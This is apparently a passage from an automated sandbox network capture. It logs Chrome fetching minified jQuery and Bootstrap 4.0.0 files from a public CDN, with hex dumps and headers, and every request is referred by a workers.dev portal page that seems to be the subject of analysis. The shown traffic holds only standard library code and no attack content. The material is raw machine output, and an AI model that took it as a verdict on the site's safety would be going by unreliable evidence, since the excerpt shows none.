                                                                      Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                                                                      Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                                                                      Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                                                                      Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                                                                      Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                                                                      Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449741104.18.11.2074434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:04 UTC623OUTGET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1
                                                                      Host: maxcdn.bootstrapcdn.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      Origin: https://portal.bakfar.workers.dev
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: text/css,*/*;q=0.1
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: style
                                                                      Referer: https://portal.bakfar.workers.dev/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-03-28 23:21:04 UTC941INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Mar 2024 23:21:04 GMT
                                                                      Content-Type: text/css; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Vary: Accept-Encoding
                                                                      CDN-PullZone: 252412
                                                                      CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                      CDN-RequestCountryCode: US
                                                                      Access-Control-Allow-Origin: *
                                                                      Cache-Control: public, max-age=31919000
                                                                      ETag: W/"450fc463b8b1a349df717056fbb3e078"
                                                                      Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                      CDN-ProxyVer: 1.04
                                                                      CDN-RequestPullSuccess: True
                                                                      CDN-RequestPullCode: 200
                                                                      CDN-CachedAt: 03/18/2024 12:15:40
                                                                      CDN-EdgeStorageId: 718
                                                                      timing-allow-origin: *
                                                                      cross-origin-resource-policy: cross-origin
                                                                      X-Content-Type-Options: nosniff
                                                                      CDN-Status: 200
                                                                      CDN-RequestId: 2bcd8edc51de29f5d13462990926a437
                                                                      CDN-Cache: HIT
                                                                      CF-Cache-Status: HIT
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Server: cloudflare
                                                                      CF-RAY: 86bb5ab9192e6906-IAD
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-03-28 23:21:04 UTC428INData Raw: 37 63 30 36 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30
                                                                      Data Ascii: 7c06/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#6610
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 61 34 30 3b 2d 2d 70 72 69 6d 61 72 79 3a 23 30 30 37 62 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32 30 30 70 78 3b 2d 2d 66 6f 6e 74 2d
                                                                      Data Ascii: a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 64 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30
                                                                      Data Ascii: xt-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:70
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74
                                                                      Data Ascii: ine:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=but
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 2c 68 36 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d
                                                                      Data Ascii: ,h6{margin-bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25rem
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 6d 6f 6e 6f 73 70 61 63 65 7d 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 65 38 33 65 38 63 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62
                                                                      Data Ascii: pre,samp{font-family:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}code{font-size:87.5%;color:#e83e8c;word-break:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;background-color:#212529;b
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 6c 2d 6c 67 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 6d 64 2c 2e 63 6f 6c 2d 6d 64 2d 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 30 2c 2e 63 6f 6c 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d 35 2c 2e 63 6f 6c 2d 73 6d 2d 36 2c
                                                                      Data Ascii: l-lg-auto,.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 30 20 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 39 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 31 30 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30
                                                                      Data Ascii: 0 66.666667%;max-width:66.666667%}.col-9{-webkit-box-flex:0;-ms-flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-10{-webkit-box-flex:0;-ms-flex:0 0 83.333333%;flex:0 0 83.333333%;max-width:83.333333%}.col-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;flex:0 0
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 74 3a 31 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 35 25 7d 2e 6f 66 66 73 65 74 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 33
                                                                      Data Ascii: t:16.666667%}.offset-3{margin-left:25%}.offset-4{margin-left:33.333333%}.offset-5{margin-left:41.666667%}.offset-6{margin-left:50%}.offset-7{margin-left:58.333333%}.offset-8{margin-left:66.666667%}.offset-9{margin-left:75%}.offset-10{margin-left:83.333333
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 73 6d 2d 66 69 72 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72
                                                                      Data Ascii: 33%;max-width:83.333333%}.col-sm-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-sm-12{-webkit-box-flex:0;-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-sm-first{-webkit-box-ordinal-group:0;-ms-flex-order


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.449742104.18.11.2074434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:04 UTC695OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                      Host: maxcdn.bootstrapcdn.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      Origin: https://portal.bakfar.workers.dev
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: script
                                                                      Referer: https://portal.bakfar.workers.dev/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-03-28 23:21:04 UTC956INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Mar 2024 23:21:04 GMT
                                                                      Content-Type: application/javascript; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Vary: Accept-Encoding
                                                                      CDN-PullZone: 252412
                                                                      CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                      CDN-RequestCountryCode: US
                                                                      Access-Control-Allow-Origin: *
                                                                      Cache-Control: public, max-age=31919000
                                                                      ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                      Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                      CDN-ProxyVer: 1.04
                                                                      CDN-RequestPullSuccess: True
                                                                      CDN-RequestPullCode: 200
                                                                      CDN-CachedAt: 03/18/2024 12:08:58
                                                                      CDN-EdgeStorageId: 1067
                                                                      timing-allow-origin: *
                                                                      cross-origin-resource-policy: cross-origin
                                                                      X-Content-Type-Options: nosniff
                                                                      CDN-Status: 200
                                                                      CDN-RequestId: 46dfbf517fa643545d5177382dd8f965
                                                                      CDN-Cache: HIT
                                                                      CF-Cache-Status: HIT
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Server: cloudflare
                                                                      CF-RAY: 86bb5ab92daa81c4-IAD
                                                                      alt-svc: h3=":443"; ma=86400
